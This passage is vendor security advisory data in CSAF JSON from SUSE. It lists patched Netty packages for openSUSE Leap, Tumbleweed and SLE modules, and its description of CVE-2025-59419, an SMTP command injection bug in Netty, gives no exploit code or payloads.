        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.s390x as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.s390x"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.s390x",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-2.0.74-150200.3.33.1.x86_64 as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.x86_64"
        },
        "product_reference": "netty-tcnative-2.0.74-150200.3.33.1.x86_64",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch as component of openSUSE Leap 15.6",
          "product_id": "openSUSE Leap 15.6:netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch"
        },
        "product_reference": "netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch",
        "relates_to_product_reference": "openSUSE Leap 15.6"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-59419",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-59419"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server\u0027s trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
          "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
          "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.s390x",
          "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
          "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
          "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
          "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.s390x",
          "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
          "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.aarch64",
          "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.ppc64le",
          "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.s390x",
          "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.x86_64",
          "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-javadoc-4.1.128-150200.4.37.1.noarch",
          "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.aarch64",
          "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.ppc64le",
          "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.s390x",
          "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.x86_64",
          "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.128-150200.4.37.1.noarch",
          "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.aarch64",
          "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.ppc64le",
          "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.s390x",
          "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.x86_64",
          "openSUSE Leap 15.6:netty-javadoc-4.1.128-150200.4.37.1.noarch",
          "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
          "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
          "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.s390x",
          "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
          "openSUSE Leap 15.6:netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-59419",
          "url": "https://www.suse.com/security/cve/CVE-2025-59419"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1252097 for CVE-2025-59419",
          "url": "https://bugzilla.suse.com/1252097"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.s390x",
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.s390x",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.aarch64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.ppc64le",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.s390x",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.x86_64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-javadoc-4.1.128-150200.4.37.1.noarch",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.aarch64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.ppc64le",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.s390x",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.x86_64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.128-150200.4.37.1.noarch",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.aarch64",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.ppc64le",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.s390x",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.x86_64",
            "openSUSE Leap 15.6:netty-javadoc-4.1.128-150200.4.37.1.noarch",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.s390x",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
            "openSUSE Leap 15.6:netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.s390x",
            "SUSE Linux Enterprise Module for Development Tools 15 SP6:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.s390x",
            "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.aarch64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.ppc64le",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.s390x",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-4.1.128-150200.4.37.1.x86_64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP6:netty-javadoc-4.1.128-150200.4.37.1.noarch",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.aarch64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.ppc64le",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.s390x",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.128-150200.4.37.1.x86_64",
            "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.128-150200.4.37.1.noarch",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.aarch64",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.ppc64le",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.s390x",
            "openSUSE Leap 15.6:netty-4.1.128-150200.4.37.1.x86_64",
            "openSUSE Leap 15.6:netty-javadoc-4.1.128-150200.4.37.1.noarch",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.aarch64",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.ppc64le",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.s390x",
            "openSUSE Leap 15.6:netty-tcnative-2.0.74-150200.3.33.1.x86_64",
            "openSUSE Leap 15.6:netty-tcnative-javadoc-2.0.74-150200.3.33.1.noarch"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-11-12T19:35:11Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-59419"
    }
  ]
}

OPENSUSE-SU-2025:15667-1

Vulnerability from csaf_opensuse - Published: 2025-10-24 00:00 - Updated: 2025-10-24 00:00

Summary

netty-4.1.128-1.1 on GA media

Notes

Title of the patch

netty-4.1.128-1.1 on GA media

Description of the patch

These are all security issues fixed in the netty-4.1.128-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-15667

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "netty-4.1.128-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the netty-4.1.128-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15667",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15667-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-59419 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-59419/"
      }
    ],
    "title": "netty-4.1.128-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-10-24T00:00:00Z",
      "generator": {
        "date": "2025-10-24T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15667-1",
      "initial_release_date": "2025-10-24T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-10-24T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-1.1.aarch64",
                "product": {
                  "name": "netty-4.1.128-1.1.aarch64",
                  "product_id": "netty-4.1.128-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-bom-4.1.128-1.1.aarch64",
                "product": {
                  "name": "netty-bom-4.1.128-1.1.aarch64",
                  "product_id": "netty-bom-4.1.128-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-javadoc-4.1.128-1.1.aarch64",
                "product": {
                  "name": "netty-javadoc-4.1.128-1.1.aarch64",
                  "product_id": "netty-javadoc-4.1.128-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-parent-4.1.128-1.1.aarch64",
                "product": {
                  "name": "netty-parent-4.1.128-1.1.aarch64",
                  "product_id": "netty-parent-4.1.128-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-1.1.ppc64le",
                "product": {
                  "name": "netty-4.1.128-1.1.ppc64le",
                  "product_id": "netty-4.1.128-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "netty-bom-4.1.128-1.1.ppc64le",
                "product": {
                  "name": "netty-bom-4.1.128-1.1.ppc64le",
                  "product_id": "netty-bom-4.1.128-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "netty-javadoc-4.1.128-1.1.ppc64le",
                "product": {
                  "name": "netty-javadoc-4.1.128-1.1.ppc64le",
                  "product_id": "netty-javadoc-4.1.128-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "netty-parent-4.1.128-1.1.ppc64le",
                "product": {
                  "name": "netty-parent-4.1.128-1.1.ppc64le",
                  "product_id": "netty-parent-4.1.128-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-1.1.s390x",
                "product": {
                  "name": "netty-4.1.128-1.1.s390x",
                  "product_id": "netty-4.1.128-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "netty-bom-4.1.128-1.1.s390x",
                "product": {
                  "name": "netty-bom-4.1.128-1.1.s390x",
                  "product_id": "netty-bom-4.1.128-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "netty-javadoc-4.1.128-1.1.s390x",
                "product": {
                  "name": "netty-javadoc-4.1.128-1.1.s390x",
                  "product_id": "netty-javadoc-4.1.128-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "netty-parent-4.1.128-1.1.s390x",
                "product": {
                  "name": "netty-parent-4.1.128-1.1.s390x",
                  "product_id": "netty-parent-4.1.128-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "netty-4.1.128-1.1.x86_64",
                "product": {
                  "name": "netty-4.1.128-1.1.x86_64",
                  "product_id": "netty-4.1.128-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-bom-4.1.128-1.1.x86_64",
                "product": {
                  "name": "netty-bom-4.1.128-1.1.x86_64",
                  "product_id": "netty-bom-4.1.128-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-javadoc-4.1.128-1.1.x86_64",
                "product": {
                  "name": "netty-javadoc-4.1.128-1.1.x86_64",
                  "product_id": "netty-javadoc-4.1.128-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "netty-parent-4.1.128-1.1.x86_64",
                "product": {
                  "name": "netty-parent-4.1.128-1.1.x86_64",
                  "product_id": "netty-parent-4.1.128-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-4.1.128-1.1.aarch64"
        },
        "product_reference": "netty-4.1.128-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-4.1.128-1.1.ppc64le"
        },
        "product_reference": "netty-4.1.128-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-4.1.128-1.1.s390x"
        },
        "product_reference": "netty-4.1.128-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-4.1.128-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-4.1.128-1.1.x86_64"
        },
        "product_reference": "netty-4.1.128-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-bom-4.1.128-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.aarch64"
        },
        "product_reference": "netty-bom-4.1.128-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-bom-4.1.128-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.ppc64le"
        },
        "product_reference": "netty-bom-4.1.128-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-bom-4.1.128-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.s390x"
        },
        "product_reference": "netty-bom-4.1.128-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-bom-4.1.128-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.x86_64"
        },
        "product_reference": "netty-bom-4.1.128-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.aarch64"
        },
        "product_reference": "netty-javadoc-4.1.128-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.ppc64le"
        },
        "product_reference": "netty-javadoc-4.1.128-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.s390x"
        },
        "product_reference": "netty-javadoc-4.1.128-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-javadoc-4.1.128-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.x86_64"
        },
        "product_reference": "netty-javadoc-4.1.128-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-parent-4.1.128-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.aarch64"
        },
        "product_reference": "netty-parent-4.1.128-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-parent-4.1.128-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.ppc64le"
        },
        "product_reference": "netty-parent-4.1.128-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-parent-4.1.128-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.s390x"
        },
        "product_reference": "netty-parent-4.1.128-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "netty-parent-4.1.128-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.x86_64"
        },
        "product_reference": "netty-parent-4.1.128-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-59419",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-59419"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server\u0027s trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:netty-4.1.128-1.1.aarch64",
          "openSUSE Tumbleweed:netty-4.1.128-1.1.ppc64le",
          "openSUSE Tumbleweed:netty-4.1.128-1.1.s390x",
          "openSUSE Tumbleweed:netty-4.1.128-1.1.x86_64",
          "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.aarch64",
          "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.ppc64le",
          "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.s390x",
          "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.x86_64",
          "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.aarch64",
          "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.ppc64le",
          "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.s390x",
          "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.x86_64",
          "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.aarch64",
          "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.ppc64le",
          "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.s390x",
          "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-59419",
          "url": "https://www.suse.com/security/cve/CVE-2025-59419"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1252097 for CVE-2025-59419",
          "url": "https://bugzilla.suse.com/1252097"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:netty-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-4.1.128-1.1.x86_64",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.x86_64",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.x86_64",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:netty-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-4.1.128-1.1.x86_64",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-bom-4.1.128-1.1.x86_64",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-javadoc-4.1.128-1.1.x86_64",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.aarch64",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.ppc64le",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.s390x",
            "openSUSE Tumbleweed:netty-parent-4.1.128-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-10-24T00:00:00Z",
          "details": "moderate"
        }
      ],
